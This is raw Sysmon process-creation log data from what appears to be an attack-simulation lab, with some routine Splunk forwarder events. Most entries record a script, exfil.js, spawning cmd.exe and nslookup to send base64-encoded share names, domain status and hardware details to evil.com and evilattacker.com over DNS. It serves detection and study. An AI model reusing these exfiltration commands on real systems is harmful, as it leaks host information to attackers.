154100x800000000000000071256Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:53.602{A8622C2F-5A89-6078-E50E-00000000AE01}3376C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A89-6078-E30E-00000000AE01}6696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluow.tmp 2>&1 154100x800000000000000071245Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:53.573{A8622C2F-5A89-6078-E30E-00000000AE01}6696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluow.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071170Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:39.130{A8622C2F-5A7B-6078-E20E-00000000AE01}5308C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A7B-6078-E00E-00000000AE01}4680C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxwa.tmp 2>&1 154100x800000000000000071159Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:39.098{A8622C2F-5A7B-6078-E00E-00000000AE01}4680C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxwa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071150Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:38.475{A8622C2F-5A7A-6078-DF0E-00000000AE01}1408C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A7A-6078-DD0E-00000000AE01}1140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnscr.tmp 2>&1 154100x800000000000000071139Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:38.445{A8622C2F-5A7A-6078-DD0E-00000000AE01}1140C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnscr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000071083Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:36.021{A8622C2F-5A78-6078-DC0E-00000000AE01}5424C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A77-6078-DA0E-00000000AE01}7036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbcov.tmp 2>&1 154100x800000000000000071072Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:35.991{A8622C2F-5A77-6078-DA0E-00000000AE01}7036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbcov.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000071010Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:23.530{A8622C2F-5A6B-6078-D90E-00000000AE01}6088C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A6B-6078-D70E-00000000AE01}7016C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgajma.tmp 2>&1 154100x800000000000000070999Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:23.500{A8622C2F-5A6B-6078-D70E-00000000AE01}7016C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgajma.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:22.345{A8622C2F-5A6A-6078-D60E-00000000AE01}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070970Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:20.527{A8622C2F-5A68-6078-D50E-00000000AE01}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070960Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:19.850{A8622C2F-5A67-6078-D40E-00000000AE01}4364C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070949Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:19.275{A8622C2F-5A67-6078-D30E-00000000AE01}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070924Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:17.477{A8622C2F-5A65-6078-D20E-00000000AE01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070912Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:16.857{A8622C2F-5A64-6078-D10E-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070902Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:16.187{A8622C2F-5A64-6078-D00E-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000070859Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:07.392{A8622C2F-5A5B-6078-CF0E-00000000AE01}6012C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A5B-6078-CD0E-00000000AE01}6652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkzoqp.tmp 2>&1 154100x800000000000000070848Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:07.361{A8622C2F-5A5B-6078-CD0E-00000000AE01}6652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkzoqp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:06.806{A8622C2F-5A5A-6078-CC0E-00000000AE01}3500C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A5A-6078-CA0E-00000000AE01}6112C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzhyy.tmp 2>&1 154100x800000000000000070828Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:06.776{A8622C2F-5A5A-6078-CA0E-00000000AE01}6112C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzhyy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070795Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:06.030{A8622C2F-5A5A-6078-C90E-00000000AE01}4604C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A5A-6078-C70E-00000000AE01}4976C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsutr.tmp 2>&1 154100x800000000000000070784Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:06.000{A8622C2F-5A5A-6078-C70E-00000000AE01}4976C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 34359328768 evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsutr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070768Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:05.941{A8622C2F-5A59-6078-C60E-00000000AE01}6164C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A59-6078-C40E-00000000AE01}6032C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqbq.tmp 2>&1 154100x800000000000000070757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:05.911{A8622C2F-5A59-6078-C40E-00000000AE01}6032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltqbq.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000070728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:05.231{A8622C2F-5A59-6078-C30E-00000000AE01}5988C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A59-6078-C10E-00000000AE01}4856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldzsoz.tmp 2>&1 154100x800000000000000070717Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:05.200{A8622C2F-5A59-6078-C10E-00000000AE01}4856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Xen evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldzsoz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070684Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:04.467{A8622C2F-5A58-6078-C00E-00000000AE01}3500C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5A58-6078-BE0E-00000000AE01}4940C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmldkf.tmp 2>&1 154100x800000000000000070673Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:23:04.438{A8622C2F-5A58-6078-BE0E-00000000AE01}4940C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: HVM domU evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmldkf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000070592Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:22:53.434{A8622C2F-5A4D-6078-BD0E-00000000AE01}6516C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com 